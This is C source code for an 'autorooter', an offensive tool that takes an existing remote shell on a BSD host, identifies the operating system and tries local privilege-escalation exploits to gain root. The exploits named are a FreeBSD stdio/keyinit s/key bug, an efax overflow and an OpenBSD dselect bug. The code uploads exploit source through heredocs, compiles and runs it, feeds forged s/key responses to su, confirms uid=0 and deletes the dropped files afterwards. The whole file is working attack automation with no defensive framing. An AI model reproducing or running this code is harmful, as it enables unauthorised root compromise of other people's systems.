/*
 * fish stiqz.
 * 
 * Basic autorooter.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>

#include "net.h"
#include "autoroot.h"

extern int errno;

/* the remote operating system types from uname -s */
enum { SYS_NONE, SYS_FBSD, SYS_OBSD, SYS_NBSD };


/*
 * checks for uid=0.
 */
int
ar_is_rooted(int sock)
{
    char buf[1024];
    int r;

    memset(buf, 0, sizeof(buf));    

    sock_printf(sock, "id;\n");

    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    }

    if (strstr(buf, "uid=0"))
        return 1;
    
    return 0;
}

/* 
 * checks for the presence of a username in the id string.
 */
int
ar_check_user(int sock, char *user)
{
    char buf[1024];
    int r;

    memset(buf, 0, sizeof(buf));
    
    sock_printf(sock, "id;\n");
    
    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    }

    if (strstr(buf, user))
        return 1;
   
    return 0;
}


/*
 * auto root via the FBSD stdio bug.
 */
int
ar_method_stdio(int sock)
{
    char buf[1024];
    char wheeluser[256];
    char *p;
    int r, i;

    memset(buf, 0, sizeof(buf));
    
    /* check for the presence of /usr/bin/keyinit */
    sock_printf(sock, "ls -l /usr/bin/keyinit;\n");
    
    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    }
    
    if (strstr(buf, "No such file"))
    {
        printf("[-] /usr/bin/keyinit does not exist.\n");
        return 0;
    } 
   
    if (r < 4)
        return 0;

    /* check for the +s bit */
    if (buf[3] != 's')
    {
        printf("[-] /usr/bin/keyinit is not suid.\n");
        return 0;
    }

    printf("[/] /usr/bin/keyinit is suid!\n");
   
    /* first step, must get group wheel so that we can su to root */
    sock_printf(sock, "cat /etc/group | grep wheel | head -1;\n");

    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    } 

    /* get a user who is in the wheel group and first su to him */
    if (strlen(buf) < 10)
        return 0;

    p = buf + 9;

    do 
    {
        i = 0;
        memset(wheeluser, 0, sizeof(wheeluser));
        p++;

        for(; *p != '\0' && *p != '\n' && *p != ','; p++) 
        {
            if (i > sizeof(wheeluser) - 1)
                break;

            wheeluser[i++] = *p;
        }
    } 
    while(strcmp(wheeluser, "root") == 0);

    if (strlen(wheeluser) <= 0)
        return 0;

    printf("[/] found wheel user: %s\n", wheeluser);
 
    /* send the necessary files over */
    sock_printf(sock, "cat > /tmp/ios.c << _EOF_;\n");
    write(sock, expl_code_iosmash1, sizeof(expl_code_iosmash1) - 1);
    write(sock, wheeluser, strlen(wheeluser));
    write(sock, expl_code_iosmash2, sizeof(expl_code_iosmash2) - 1);
    sock_printf(sock, "_EOF_\n");

    sock_printf(sock, "cat > /tmp/iosf.c << _EOF_;\n");
    write(sock, expl_code_iosfork, sizeof(expl_code_iosfork) - 1);
    sock_printf(sock, "_EOF_\n");

    /* execute the exploit. */
    sock_printf(sock, "gcc -o /tmp/ios /tmp/ios.c > /dev/null 2>&1;\n");
    sock_printf(sock, "gcc -o /tmp/iosf /tmp/iosf.c > /dev/null 2>&1;\n");
    sock_printf(sock, "rm -f /tmp/ios.c /tmp/iosf.c;\n");
    sock_printf(sock, "/tmp/iosf;\n");

    /* get the response from the exploit */
    memset(buf, 0, sizeof(buf));
    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    }

    if (strstr(buf, "Adding"))
        printf("[/] added skey for user %s\n", wheeluser);
    else
        printf("[-] probably failed to add skey for user %s\n", wheeluser); 

    /* try to su to this user */
    /* first get the skey session number so that we know which
       key to use */
    sock_printf(sock, "su %s;\n", wheeluser);
    sock_printf(sock, "blahblah\n");

    /* read 3 lines from the socket, Password, Sorry, s/key 9X ... */
    for (i = 0; i < 3; i++)
    {
        memset(buf, 0, sizeof(buf));
        if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
        {
            perror("sock_readline()");
            return 0;
        }
       
        if (buf[r-1] != '\n')
            i--;
#ifdef DEBUG 
        printf("read: %s\n", buf);
#endif /* DEBUG */
    } 
 
    /* parse out the key session number */
    if (strncmp(buf, "s/key ", 6) != 0)
        return 0;

    p = buf + 6;
    i = atoi(p);

    printf("[/] s/key session id = %d\n", i); 
    
    i = i - 95;   
    if (i < 0 || i > (sizeof(iosmash_keys) / sizeof(char *)))
    {
        printf("[-] invalid s/key session id.\n"); 
        return 0;
    }

    /* send the correct s/key to the su program */
    printf("[/] sending %s as the s/key.\n", iosmash_keys[i]);
    sock_printf(sock, "su %s;\n", wheeluser);
    sock_printf(sock, "%s\n", iosmash_keys[i]); 
  
    /* read in the password prompt */
    for (i = 0; i < 1; i++)
    {
        memset(buf, 0, sizeof(buf));
        if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
        {
            perror("sock_readline()");
            return 0;
        }

        if (buf[r-1] != '\n')
            i--;
#ifdef DEBUG
        printf("read: %s\n", buf);
#endif /* DEBUG */
    }

    if (ar_check_user(sock, wheeluser))
        printf("[+] successfully su'd to %s (going for root)\n", wheeluser);
    else
        return 0;

    /* at this point, we go for root */

    /* first, we need to start a /bin/sh, since we dont know what type
       of shell the user will be running */
    sock_printf(sock, "/bin/sh;\n");    

    sock_printf(sock, "cat > /tmp/ios2.c << _EOF_;\n");
    write(sock, expl_code_iosmash1, sizeof(expl_code_iosmash1) - 1);
    write(sock, "root", 4);
    write(sock, expl_code_iosmash2, sizeof(expl_code_iosmash2) - 1);
    sock_printf(sock, "_EOF_\n"); 
    sock_printf(sock, "gcc -o /tmp/ios2 /tmp/ios2.c > /dev/null 2>&1;\n");
   
    sock_printf(sock, "cat > /tmp/iosf2.c << _EOF_;\n");
    write(sock, expl_code_iosfork2, sizeof(expl_code_iosfork2) - 1);
    sock_printf(sock, "_EOF_\n");

    /* compile the iosmash forker */
    sock_printf(sock, "gcc -o /tmp/iosf2 /tmp/iosf2.c > /dev/null 2>&1;\n");
    sock_printf(sock, "rm -f /tmp/ios2.c /tmp/iosf2.c;\n");
    
    do
    {
        sock_printf(sock, "/tmp/iosf2;\n");

        memset(buf, 0, sizeof(buf));

        /* read in the response from the exploit */
        if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
        {
            perror("sock_readline()");
            return 0; 
        }
#ifdef DEBUG
        printf("read: [%s]\n", buf);
#endif
        if (strstr(buf, "Updating") && !strstr(buf, "Old key"))
        {
            if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
            {
                perror("sock_readline()");
                return 0;
            }
#ifdef DEBUG  
            printf("read: [%s]\n", buf);
#endif
        } 

    }
    while (strstr(buf, "Adding") == NULL);


    /* get the s/key id again */
    sock_printf(sock, "su;\n");
    sock_printf(sock, "blahblah\n");
   
    /* read 3 lines from the socket, Password, Sorry, s/key 9X ... */
    for (i = 0; i < 3; i++)
    {
        memset(buf, 0, sizeof(buf));
        if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
        {
            perror("sock_readline()");
            return 0;
        }

        if (buf[r-1] != '\n')
            i--;
#ifdef DEBUG
        printf("read: %s\n", buf);
#endif /* DEBUG */
    }
 
    /* parse out the key session number */
    if (strncmp(buf, "s/key ", 6) != 0)
        return 0;

    p = buf + 6;
    i = atoi(p);

    printf("[/] s/key session id = %d\n", i);

    i = i - 95;
    if (i < 0 || i > (sizeof(iosmash_keys) / sizeof(char *)))
    {
        printf("[-] invalid s/key session id.\n");
        return 0;
    }

    /* send the correct s/key to the su program */
    printf("[/] sending %s as the s/key.\n", iosmash_keys[i]);
    sock_printf(sock, "su;\n");
    sock_printf(sock, "%s\n", iosmash_keys[i]);

    /* read in the password prompt */
    for (i = 0; i < 1; i++)
    {
        memset(buf, 0, sizeof(buf));
        if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
        {
            perror("sock_readline()");
            return 0;
        }

        if (buf[r-1] != '\n')
            i--;
#ifdef DEBUG
        printf("read: %s\n", buf);
#endif /* DEBUG */
    }

    /* delete the compiled exploit files */
    sock_printf(sock, "rm -f /tmp/ios /tmp/ios2 /tmp/iosf /tmp/iosf2;\n");

    if (ar_is_rooted(sock))
    {
        printf("[+] successfully su'd to root\n");
        sock_printf(sock, "/bin/sh;\n");
        return 1;
    }
    
    return 0;

}

/*
 * auto root via the efax overflow.
 */
int
ar_method_efax(int sock)
{
    char buf[1024];
    int r, s_flags;
    fd_set rset;
    struct timeval to;

    /* check for the presence of efax first */
    sock_printf(sock, "ls -l /usr/local/bin/efax;\n");

    memset(buf, 0, sizeof(buf));
    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        return 0;
    }
 
    if (r < 4)
    {
        printf("[-] read too little data...\n");
        return 0;
    }

    /* check for no such file */
    if (strstr(buf, "No such file"))
    {
        printf("[-] /usr/local/bin/efax does not exist.\n");
        return 0;
    }

    /* check for the +s bit */
    if (buf[3] == 's')
    {
        printf("[/] /usr/local/bin/efax exists and is suid!.\n");

        /* send the exploit file over */
        sock_printf(sock, "cat > /tmp/ef.c << _EOF_;\n");
        write(sock, expl_code_efax, sizeof(expl_code_efax) - 1);
        sock_printf(sock, "_EOF_\n");

        sock_printf(sock, "gcc -o /tmp/ef /tmp/ef.c;\n");
        sock_printf(sock, "/tmp/ef 500;\n");

        /* read in all available data */

        s_flags = fcntl(sock, F_GETFL, 0);
        fcntl(sock, F_SETFL, s_flags | O_NONBLOCK);
        memset(&to, 0, sizeof(to));
        to.tv_sec = 5;
        to.tv_usec = 0;

        printf("[/] waiting 5 seconds for remaining junk data...\n");

        for(;;) 
        {
            FD_ZERO(&rset);
            FD_SET(sock, &rset);
            select(sock + 1, &rset, NULL, NULL, &to);
    
            if (FD_ISSET(sock, &rset))
            {
                r = read(sock, buf, sizeof(buf));

                if (r <= 0)
                    break;
            } 
            else /* timeout */
                break;
        }
 
        fcntl(sock, F_SETFL, s_flags);

        /* remove the created files */
        sock_printf(sock, "rm -f /tmp/ef /tmp/ef.c > /dev/null 2>&1;\n");
        
        /* check the id */ 
        if (ar_is_rooted(sock))
            return 1;
    }
    else 
        printf("[-] /usr/local/bin/efax is not suid.\n");
    

    return 0; 
}


int
ar_method_dselect(int sock)
{
    char buf[1024];
    int r, s_flags;
    fd_set rset;
    struct timeval to;

    /* send the exploit over */
    sock_printf(sock, "cat > /tmp/ds.c << _EOF_;\n");
    write(sock, expl_code_dselect, sizeof(expl_code_dselect) - 1);
    sock_printf(sock, "_EOF_\n");

    /* compile */
    sock_printf(sock, "gcc -o /tmp/ds /tmp/ds.c;\n");
    sock_printf(sock, "/tmp/ds;\n");

    /* read in all available data */
    s_flags = fcntl(sock, F_GETFL, 0);
    fcntl(sock, F_SETFL, s_flags | O_NONBLOCK);
    memset(&to, 0, sizeof(to));
    to.tv_sec = 5;
    to.tv_usec = 0;

    printf("[/] waiting 5 seconds for remaining junk data...\n");

    for(;;)
    {
        FD_ZERO(&rset);
        FD_SET(sock, &rset);
        select(sock + 1, &rset, NULL, NULL, &to);

        if (FD_ISSET(sock, &rset))
        {
            r = read(sock, buf, sizeof(buf));

            if (r <= 0)
                break;
        }
        else /* timeout */
            break;
    }

    fcntl(sock, F_SETFL, s_flags);

    /* remove the created files */
    sock_printf(sock, "rm -f /tmp/ds /tmp/ds.c > /dev/null 2>&1;\n");

    if (ar_is_rooted(sock))
        return 1;

    return 0;
} 


/*
 * the autorooter, returns 1 on success or 0 on failure 
 */
int
auto_root(int sock)
{
    char buf[1024];
    int r;
    int systype = SYS_NONE;
 
    memset(buf, 0, sizeof(buf));
 
    /* first send a uname -s, only works on FreeBSD right now */
    sock_printf(sock, "uname -s;\n"); 

    if ((r = sock_readline(sock, buf, sizeof(buf) - 1)) <= 0)
    {
        perror("sock_readline()");
        exit(EXIT_FAILURE);
    }

    if (strstr(buf, "FreeBSD"))
        systype = SYS_FBSD;

    else if (strstr(buf, "OpenBSD"))
        systype = SYS_OBSD;

    else if (strstr(buf, "NetBSD"))
        systype = SYS_NBSD;

    else
        systype = SYS_NONE;

    switch(systype)
    {
    case SYS_FBSD:
        printf("[*] detected FreeBSD.\n");

        printf("[*] trying efax...\n");
        if (!ar_method_efax(sock))
            printf("[-] efax bug failed.\n");
        else
        {
            printf("[+] efax bug worked.\n");
            return 1;
        }

        printf("[*] trying stdio bug...\n");
        if (!ar_method_stdio(sock))
            printf("[-] stdio bug failed.\n");
        else
        {
            printf("[+] stdio bug worked.\n");
            return 1;
        }

        return 0; 
        break;

    case SYS_OBSD:
        printf("[*] detected OpenBSD.\n");
        if (!ar_method_dselect(sock))
            printf("[-] dselect bug failed.\n");
        else
        {
            printf("[-] dselect bug worked.\n");
            return 1;
        }
        
        return 0;
        break;

    case SYS_NBSD:
        printf("[*] detected NetBSD.\n");

    default:
        printf("[-] unsupported system type for auto root module.\n");
        break;
    }

    return 0;
} 
    

    

     
